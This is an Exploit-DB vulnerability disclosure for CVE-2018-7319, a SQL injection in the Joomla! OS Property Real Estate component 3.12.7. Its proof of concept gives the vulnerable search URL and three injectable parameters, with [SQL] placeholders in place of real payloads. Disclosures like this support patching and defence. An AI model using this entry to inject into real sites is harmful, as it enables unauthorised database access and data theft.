Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection

EDB-ID: 44165
Author: Ihsan Sencan
Published: 2018-02-22
CVE: CVE-2018-7319
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Exploit Title: Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection 
 # Dork: N/A 
 # Date: 22.02.2018 
 # Vendor Homepage: https://www.joomdonation.com/ 
 # Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property/ 
 # Version: 3.12.7 
 # Category: Webapps 
 # Tested on: WiN7_x64/KaLiLinuX_x64 
 # CVE: CVE-2018-7319 
 # # # # 
 # Exploit Author: Ihsan Sencan 
 # # # # 
 #  
 # POC:  
 #  
 # 1) 
 # http://localhost/[PATH]/os-property-layouts/search-tools/advanced-search?&option=com_osproperty&task=property_advsearch 
 # &cooling_system1=[SQL] 
 # &heating_system1=[SQL] 
 # &laundry=[SQL] 
 #  
 # # # #

Source: www.exploit-db.com